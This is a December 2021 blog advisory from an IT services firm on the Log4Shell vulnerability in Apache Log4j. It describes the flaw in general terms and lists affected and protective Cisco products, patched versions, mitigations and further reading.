Log4Shell vulnerability

Published: 15th December 2021
Log4j Vulnerability Update

Investigators have found that the initial workarounds and fixes suggested in CVE-2021-44228 do not provide complete coverage for the Log4j vulnerability. Log4j users are now recommended to use v2.16. This follow-up advice is tracked against CVE-2021-45046.

Cisco is continuing to track their vulnerable and not-vulnerable products at this URL:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-Log4j-qRuKNEbd

Cisco (including Cisco Meraki) have released enhancements to their IDS signatures to help clients detect and prevent exploitation attempts. Cisco’s EDR platform, Secure Endpoint, has also been updated to detect Log4j vulnerability exploitation attempts.

ITGL is continuing to actively monitor this situation. If any ITGL clients are concerned about their exposure to this vulnerability through a Cisco product we support, we encourage you to raise a support ticket with us.

Published: 12th December 2021
Please note that this information is not exhaustive. We are advising clients to keep checking for any vendor advisory updates.

The #Log4Shell vulnerability is being reported as the single biggest, most critical vulnerability of the last decade – and possibly the biggest in the history of modern computing1.

ITGL has contacted clients to ensure they are aware of the vulnerability and the Cisco products affected, so they can maintain protection as Cisco updates their products against this vulnerability.

The fact that this vulnerability is contained in a ubiquitous logging tool means that this is an issue for countless private and public sector organisations, and across many technology vendors. This is a developing scenario and the fallout may not be known for several days.

What we know

On 9 December, the Apache Foundation disclosed a zero-day vulnerability in the widely used Java software library Log4j. This is identified as CVE-2021-44228 and has a Kenna risk score of 93 out of 100; an exceptionally rare score which reflects the severity and potential impact of this vulnerability.

Our support teams are monitoring the situation and the impact on Cisco in particular. If a client is unsure if a particular Cisco system we support is impacted, they can raise a support case with us. We will help them determine if the system is impacted and the remedial actions required.

Cisco Talos has been tracking exploitations of this vulnerability and is listing products which can detect and block exploitations seen to date. These products include:

  • Cisco Secure Endpoint
  • Cisco Secure Firewalls including Firepower and Meraki MX
  • Umbrella SIG
  • Cisco Secure Malware Analytics

We encourage all clients to visit:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd to see which Cisco products are affected or under investigation. As vulnerable Cisco products are identified, Cisco will post the associated bug id and the workaround when available. This information will be constantly updated, so please keep checking.

CVE-2021-44228

A vulnerability (CVE-2021-44228, also known as Log4Shell) was recently discovered in a common software package called Log4j. The vulnerability can provide remote unauthenticated attackers with the ability to execute code and steal data from any system that uses Log4j. The vulnerability is being actively exploited across the world.

Log4j is embedded in numerous software packages, SaaS, and hardware products to help those systems log data. Due to the way modern software packages are built, it may not be obvious to you if any of your systems use Log4j. Investigation and verification is recommended with your suppliers and with any in-house software development teams.

The vulnerability allows an unauthenticated attacker to send a crafted, malicious message to the system, and when that message is logged, the malicious payload within is executed.

Fixed Software

Log4j versions 2.15.0 or later are confirmed as being fixed and free of this vulnerability. Upgrades to this software version are recommended.

Log4j versions 2.10 or later can be made safe by setting the system property ‘log4j2.formatMsgNoLookups’ to true.

Log4j is supplied by Apache:

https://logging.apache.org/log4j/2.x/

Embedded systems

Log4j is embedded in many systems and you may not be able to update Log4j yourself. Check with your vendors to determine your level of impact. Work is ongoing across the industry to determine which systems and versions are impacted, and to provide fixes for those systems found to be vulnerable.

Mitigation

There are no universally effective mitigations other than to use safe versions of the Log4j software.

Partially effective mitigations may include:

  • Limiting access at the IP layer to at-risk systems
  • Use of IPS signatures

Cisco has also updated several Cisco security products (identified above) to detect and block attacks, however, clients should upgrade vulnerable systems as soon as possible.

Enhanced vigilance is recommended across all systems. Monitor security logs regularly for signs of attempted compromise.

Further reading

Information is available from other reputable sources:

National Cyber Security Centre – https://www.ncsc.gov.uk/news/apache-log4j-vulnerability

Cisco Talos – https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html?m=1

NHS Digital – https://digital.nhs.uk/cyber-alerts/2021/cc-3989

References

  1. https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
Facebooktwitterlinkedinmail

Published by Liam James
December 12, 2021

Categories: